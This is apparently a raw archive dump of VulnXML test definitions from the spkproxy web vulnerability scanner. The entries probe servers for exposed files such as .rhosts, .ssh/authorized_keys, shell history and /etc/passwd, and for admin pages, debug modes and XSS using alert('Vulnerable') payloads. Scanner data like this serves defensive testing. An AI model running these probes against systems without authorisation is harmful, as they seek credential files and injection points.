HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-177.xml0100664000076500007650000000710407566204543017565 0ustar davedave (.pinerc) "User home dir found with a PINE rc file. May reveal system information 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.pinerc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-178.xml0100664000076500007650000000702407566204543017567 0ustar davedave (.plan) "User home dir with a .plan 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.plan HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-179.xml0100664000076500007650000000710407566204543017567 0ustar davedave (.proclog) "User home dir with a Procmail log file. May reveal user mail traffic 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.proclog HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-17.xml0100664000076500007650000000715707566204543017506 0ustar davedave (?N=D) "Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?N=D HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of \\/ 200 index of \\/ 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-180.xml0100664000076500007650000000710707566204543017562 0ustar davedave (.procmailrc) "User home dir with a Procmail rc file. May reveal sub directories 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.procmailrc HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-181.xml0100664000076500007650000000715207566204543017563 0ustar davedave (.profile) "User home dir with a shell profile was found. May reveal directory information and system configuration." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.profile HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-182.xml0100664000076500007650000000706007566204543017562 0ustar davedave (.rhosts) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.rhosts HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-183.xml0100664000076500007650000000707007566204543017564 0ustar davedave (.sh_history) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.sh_history HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-184.xml0100664000076500007650000000705207566204543017565 0ustar davedave (.ssh) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.ssh HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-185.xml0100664000076500007650000000711207566204543017563 0ustar davedave (.ssh/authorized_keys) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.ssh/authorized_keys HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-186.xml0100664000076500007650000000710207566204543017563 0ustar davedave (.ssh/known_hosts) "A user's home directory may be set to the web root 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.ssh/known_hosts HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-187.xml0100664000076500007650000000715307566204543017572 0ustar davedave (/etc/passwd) "The server install allows reading of any system file by adding an extra '/' to the URL." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET //etc/passwd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ root\: 200 root\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-188.xml0100664000076500007650000000731107566204543017567 0ustar davedave (/profile.php?u=JUNK(8)) "Powerboards (http://powerboards.sourceforge.net/) is vulnerable to path disclosure. See http://www.ifrance.com/kitetoua/tuto/powerboards.txt for details." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET //profile.php?u=JUNK(8) HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Warning\: 200 Warning\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-189.xml0100664000076500007650000000744307566204543017576 0ustar davedave (<script>alert('Vulnerable')</script>.aspx) "Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /<script>alert('Vulnerable')</script>.aspx HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-18.xml0100664000076500007650000000715707566204543017507 0ustar davedave (?S=A) "Apache allows directory listings by requesting. Upgrade Apache or disable directory indexing." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?S=A HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ index of \\/ 200 index of \\/ 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-190.xml0100664000076500007650000000725507566204543017567 0ustar davedave (?sql_debug=1) "The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /?sql_debug=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SQL query\: 200 SQL query\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-191.xml0100664000076500007650000000720607566204543017564 0ustar davedave (a%5c.aspx) "Older Microsoft .NET installations allow full path disclosure." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /a%5c.aspx HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Invalid file name for monitoring\: 200 Invalid file name for monitoring\: 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-192.xml0100664000076500007650000000703707566204543017567 0ustar davedave (a/) "May be Kebi Web Mail administration menu." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /a/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-193.xml0100664000076500007650000000704107566204543017563 0ustar davedave (access-log) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /access-log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-194.xml0100664000076500007650000000704107566204543017564 0ustar davedave (access.log) "Just found this log file..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /access.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-195.xml0100664000076500007650000000703407566204543017567 0ustar davedave (access/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /access/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-196.xml0100664000076500007650000000703607566204543017572 0ustar davedave (account/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /account/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-197.xml0100664000076500007650000000704407566204543017572 0ustar davedave (accounting/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /accounting/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-198.xml0100664000076500007650000000713107566204543017570 0ustar davedave (active.log) "The WebActive log is accessible remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /active.log HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ WEBactive Http Server 200 WEBactive Http Server 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-199.xml0100664000076500007650000000754407566204543017601 0ustar davedave (add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>) "AdManager 1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-19.xml0100664000076500007650000000707107566204543017503 0ustar davedave (.DS_Store) "Apache on Mac OSX will serve the .DS_Store file 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.DS_Store HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Bud1 200 Bud1 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-200.xml0100664000076500007650000000730007566204543017546 0ustar davedave (add_user.php) "DCP-Portal reveals system path. Upgrade to a version higher than 4.2. This version is also vulnerable to Cross Site Scripting (XSS). CA-2000-02." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /add_user.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ output started at / 200 output started at / 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-201.xml0100664000076500007650000000704007566204543017550 0ustar davedave (admin.htm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-202.xml0100664000076500007650000000704207566204543017553 0ustar davedave (admin.html) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-203.xml0100664000076500007650000000704007566204543017552 0ustar davedave (admin.php) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.php HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-204.xml0100664000076500007650000000704207566204543017555 0ustar davedave (admin.php3) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.php3 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-205.xml0100664000076500007650000000720607566204543017560 0ustar davedave (admin.php4?reg_login=1) "Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.php4?reg_login=1 HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-206.xml0100664000076500007650000000725407566204543017564 0ustar davedave (admin.php?en_log_id=0&action=config) "EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.php?en_log_id=0&action=config HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-207.xml0100664000076500007650000000725207566204543017563 0ustar davedave (admin.php?en_log_id=0&action=users) "EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This php file should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.php?en_log_id=0&action=users HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-208.xml0100664000076500007650000000704407566204543017563 0ustar davedave (admin.shtml) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin.shtml HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-209.xml0100664000076500007650000000703207566204543017561 0ustar davedave (admin/) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-20.xml0100664000076500007650000000720707566204543017474 0ustar davedave (.FBCIndex) "This file son OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /.FBCIndex HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Bud2 200 Bud2 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-210.xml0100664000076500007650000000722407566204543017554 0ustar davedave (admin/contextAdmin/contextAdmin.html) "Tomcat may be configured to let attackers read arbitrary files. Restrict access to /admin." 0.0 .* See the description for 